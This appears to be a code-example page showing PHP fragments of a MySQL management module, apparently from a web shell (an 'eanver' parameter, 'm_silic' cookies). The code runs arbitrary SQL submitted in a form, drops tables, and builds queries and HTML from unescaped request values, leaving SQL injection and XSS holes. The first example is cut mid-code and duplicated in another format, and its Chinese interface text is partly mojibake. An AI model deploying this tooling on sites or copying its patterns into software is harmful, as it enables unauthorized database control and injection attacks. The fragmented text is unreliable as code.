Exemplo n.º 1
0
					echo '<table border="0"><tr>';
					echo '<td class="toptd" style="width:70px;" nowrap>操作</td>';
					while($row = @mysql_fetch_assoc($result))
					{
						array_push($fields,$row['Field']);
						echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
					}
					echo '</tr>';
					if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
					$result = mysql_query($query,$conn);
					$v = $p;
					while($text = @mysql_fetch_assoc($result))
					{
						echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> 修改 </a> ';
						echo '<a href="#" onclick="Delok(\'它\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> 删除 </a></td>';
						foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
						echo '</tr>'."\r\n";$v++;
					}
					echo '</table><div class="actall">';
                    $pagep=$page-1;
                    $pagen=$page+1;
                    echo "共有 ".$row_num." 条记录 ";
                    if($pagep>0) $pagenav.="  <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'>首页</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'>上一页</a> "; else $pagenav.=" 上一页 ";
                    if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'>下一页</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'>尾页</a>"; else $pagenav.=" 下一页 ";
                    $pagenav.=" 第 [".$page."/".$pages."] 页   跳到<input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />页";
                    echo $pagenav;
					echo '</div>';
				}
			}
			elseif(isset($_GET['insert']))
			{
     array_push($fields, $row['Field']);
     echo '<td class="toptd" nowrap>' . $row['Field'] . '</td>';
 }
 echo '</tr>';
 if (eregi('WHERE|LIMIT', $_POST['nsql']) && eregi('SELECT|FROM', $_POST['nsql'])) {
     $query = $_POST['nsql'];
 } else {
     $query = 'SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $p . ', 20;';
 }
 $result = mysql_query($query, $conn);
 $v = $p;
 while ($text = @mysql_fetch_assoc($result)) {
     echo '<tr><td><a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&edit=' . $v . '"> 修改 </a> ';
     echo '<a href="#" onclick="Delok(\'它\',\'?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&del=' . $v . '\');return false;"> 删除 </a></td>';
     foreach ($fields as $row) {
         echo '<td>' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . '</td>';
     }
     echo '</tr>' . "\r\n";
     $v++;
 }
 echo '</table><div class="actall">';
 $pagep = $page - 1;
 $pagen = $page + 1;
 echo "共有 " . $row_num . " 条记录 ";
 if ($pagep > 0) {
     $pagenav .= "  <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=1&charset=" . $_GET['charset'] . "'>首页</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagep . "&charset=" . $_GET['charset'] . "'>上一页</a> ";
 } else {
     $pagenav .= " 上一页 ";
 }
 if ($pagen <= $pages) {
     $pagenav .= " <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagen . "&charset=" . $_GET['charset'] . "'>下一页</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pages . "&charset=" . $_GET['charset'] . "'>尾页</a>";
Exemplo n.º 3
0
function Mysql_Msg()
{
    $conn = @mysql_connect($_COOKIE['m_silichost'] . ':' . $_COOKIE['m_silicport'], $_COOKIE['m_silicuser'], $_COOKIE['m_silicpass']);
    if ($conn) {
        print <<<END
<script language="javascript">
function Delok(msg,gourl)
{
\tsmsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
\tif(confirm(smsg)){window.location = gourl;}
}
function Createok(ac)
{
\tif(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (spider BLOB);';
\tif(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
\tif(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
\treturn false;
}
</script>
END;
        $BOOL = false;
        $MSG_BOX = '�û�:' . $_COOKIE['m_silicuser'] . ' &nbsp;&nbsp;&nbsp;&nbsp; ��ַ:' . $_COOKIE['m_silichost'] . ':' . $_COOKIE['m_silicport'] . ' &nbsp;&nbsp;&nbsp;&nbsp; �汾:';
        $k = 0;
        $result = @mysql_query('select version();', $conn);
        while ($row = @mysql_fetch_array($result)) {
            $MSG_BOX .= $row[$k];
            $k++;
        }
        echo '<div class="actall"> ���ݿ�:';
        $result = mysql_query("SHOW DATABASES", $conn);
        while ($db = mysql_fetch_array($result)) {
            echo '&nbsp;&nbsp;[<a href="?s=r&db=' . $db['Database'] . '">' . $db['Database'] . '</a>]';
        }
        echo '</div>';
        if (isset($_GET['db'])) {
            mysql_select_db($_GET['db'], $conn);
            if (!empty($_POST['nsql'])) {
                $BOOL = true;
                $MSG_BOX = mysql_query($_POST['nsql'], $conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� ' . mysql_error();
            }
            if (is_array($_POST['insql'])) {
                $query = 'INSERT INTO ' . $_GET['table'] . ' (';
                foreach ($_POST['insql'] as $var => $key) {
                    $querya .= $var . ',';
                    $queryb .= '\'' . addslashes($key) . '\',';
                }
                $query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');';
                $MSG_BOX = mysql_query($query, $conn) ? '���ӳɹ�' : '����ʧ�� ' . mysql_error();
            }
            if (is_array($_POST['upsql'])) {
                $query = 'UPDATE ' . $_GET['table'] . ' SET ';
                foreach ($_POST['upsql'] as $var => $key) {
                    $queryb .= $var . '=\'' . addslashes($key) . '\',';
                }
                $query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';';
                $MSG_BOX = mysql_query($query, $conn) ? '�޸ijɹ�' : '�޸�ʧ�� ' . mysql_error();
            }
            if (isset($_GET['del'])) {
                $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn);
                $good = mysql_fetch_assoc($result);
                $query = 'DELETE FROM ' . $_GET['table'] . ' WHERE ';
                foreach ($good as $var => $key) {
                    $queryc .= $var . '=\'' . addslashes($key) . '\' AND ';
                }
                $where = $query . substr($queryc, 0, -4) . ';';
                $MSG_BOX = mysql_query($where, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error();
            }
            $action = '?s=r&db=' . $_GET['db'];
            if (isset($_GET['drop'])) {
                $query = 'Drop TABLE IF EXISTS ' . $_GET['drop'] . ';';
                $MSG_BOX = mysql_query($query, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error();
            }
            if (isset($_GET['table'])) {
                $action .= '&table=' . $_GET['table'];
                if (isset($_GET['edit'])) {
                    $action .= '&edit=' . $_GET['edit'];
                }
            }
            if (isset($_GET['insert'])) {
                $action .= '&insert=' . $_GET['insert'];
            }
            echo '<div class="actall"><form method="POST" action="' . $action . '">';
            echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">' . $_POST['nsql'] . '</textarea> ';
            echo '<input type="submit" name="querysql" value="ִ��" style="width:60px;height:49px;"> ';
            echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
            echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
            echo '<input type="button" value="ɾ����" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
            echo '<div class="msgbox" style="height:40px;">' . $MSG_BOX . '</div><div class="actall"><a href="?s=r&db=' . $_GET['db'] . '">' . $_GET['db'] . '</a> ---> ';
            if (isset($_GET['table'])) {
                echo '<a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '">' . $_GET['table'] . '</a> ';
                echo '[<a href="?s=r&db=' . $_GET['db'] . '&insert=' . $_GET['table'] . '">����</a>]</div>';
                if (isset($_GET['edit'])) {
                    if (isset($_GET['p'])) {
                        $atable = $_GET['table'] . '&p=' . $_GET['p'];
                    } else {
                        $atable = $_GET['table'];
                    }
                    echo '<form method="POST" action="?s=r&db=' . $_GET['db'] . '&table=' . $atable . '">';
                    $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn);
                    $good = mysql_fetch_assoc($result);
                    $u = 0;
                    foreach ($good as $var => $key) {
                        $queryc .= $var . '=\'' . $key . '\' AND ';
                        $type = @mysql_field_type($result, $u);
                        $len = @mysql_field_len($result, $u);
                        echo '<div class="actall">' . $var . ' <font color="#FF0000">' . $type . '(' . $len . ')</font><br><textarea name="upsql[' . $var . ']" style="width:600px;height:60px;">' . htmlspecialchars($key) . '</textarea></div>';
                        $u++;
                    }
                    $where = 'WHERE ' . substr($queryc, 0, -4);
                    echo '<input type="hidden" id="wherevar" name="wherevar" value="' . base64_encode($where) . '">';
                    echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
                } else {
                    $query = 'SHOW COLUMNS FROM ' . $_GET['table'];
                    $result = mysql_query($query, $conn);
                    $fields = array();
                    $row_num = mysql_num_rows(mysql_query('SELECT * FROM ' . $_GET['table'], $conn));
                    if (!isset($_GET['p'])) {
                        $p = 0;
                        $_GET['p'] = 1;
                    } else {
                        $p = ((int) $_GET['p'] - 1) * 20;
                    }
                    echo '<table border="0"><tr>';
                    echo '<td class="toptd" style="width:70px;" nowrap>����</td>';
                    while ($row = @mysql_fetch_assoc($result)) {
                        array_push($fields, $row['Field']);
                        echo '<td class="toptd" nowrap>' . $row['Field'] . '</td>';
                    }
                    echo '</tr>';
                    if (eregi('WHERE|LIMIT', $_POST['nsql']) && eregi('SELECT|FROM', $_POST['nsql'])) {
                        $query = $_POST['nsql'];
                    } else {
                        $query = 'SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $p . ', 20;';
                    }
                    $result = mysql_query($query, $conn);
                    $v = $p;
                    while ($text = @mysql_fetch_assoc($result)) {
                        echo '<tr><td><a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&edit=' . $v . '"> �޸� </a> ';
                        echo '<a href="#" onclick="Delok(\'��\',\'?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&del=' . $v . '\');return false;"> ɾ�� </a></td>';
                        foreach ($fields as $row) {
                            echo '<td>' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . '</td>';
                        }
                        echo '</tr>' . "\r\n";
                        $v++;
                    }
                    echo '</table><div class="actall">';
                    for ($i = 1; $i <= ceil($row_num / 20); $i++) {
                        $k = (int) $_GET['p'] == $i ? '<font color="#FF0000">' . $i . '</font>' : $i;
                        echo '<a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $i . '">[' . $k . ']</a> ';
                    }
                    echo '</div>';
                }
            } elseif (isset($_GET['insert'])) {
                echo '<a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['insert'] . '">' . $_GET['insert'] . '</a></div>';
                $result = mysql_query('SELECT * FROM ' . $_GET['insert'], $conn);
                $fieldnum = @mysql_num_fields($result);
                echo '<form method="POST" action="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['insert'] . '">';
                for ($i = 0; $i < $fieldnum; $i++) {
                    $name = @mysql_field_name($result, $i);
                    $type = @mysql_field_type($result, $i);
                    $len = @mysql_field_len($result, $i);
                    echo '<div class="actall">' . $name . ' <font color="#FF0000">' . $type . '(' . $len . ')</font><br><textarea name="insql[' . $name . ']" style="width:600px;height:60px;"></textarea></div>';
                }
                echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
            } else {
                $query = 'SHOW TABLE STATUS';
                $status = @mysql_query($query, $conn);
                while ($statu = @mysql_fetch_array($status)) {
                    $statusize[] = $statu['Data_length'];
                    $statucoll[] = $statu['Collation'];
                }
                $query = 'SHOW TABLES FROM ' . $_GET['db'] . ';';
                echo '</div><table border="0"><tr>';
                echo '<td class="toptd" style="width:550px;"> ���� </td>';
                echo '<td class="toptd" style="width:80px;"> ���� </td>';
                echo '<td class="toptd" style="width:130px;"> �ַ��� </td>';
                echo '<td class="toptd" style="width:70px;"> ��С </td></tr>';
                $result = @mysql_query($query, $conn);
                $k = 0;
                while ($table = mysql_fetch_row($result)) {
                    echo '<tr><td><a href="?s=r&db=' . $_GET['db'] . '&table=' . $table[0] . '">' . $table[0] . '</a></td>';
                    echo '<td><a href="?s=r&db=' . $_GET['db'] . '&insert=' . $table[0] . '"> ���� </a> <a href="#" onclick="Delok(\'' . $table[0] . '\',\'?s=r&db=' . $_GET['db'] . '&drop=' . $table[0] . '\');return false;"> ɾ�� </a></td>';
                    echo '<td>' . $statucoll[$k] . '</td><td align="right">' . File_Size($statusize[$k]) . '</td></tr>' . "\r\n";
                    $k++;
                }
                echo '</table>';
            }
        }
    } else {
        die('����MYSQLʧ��,�����µ�½.<meta http-equiv="refresh" content="0;URL=?s=o">');
    }
    if (!$BOOL) {
        echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \'' . addslashes($query) . '\';</script>';
    }
    return false;
}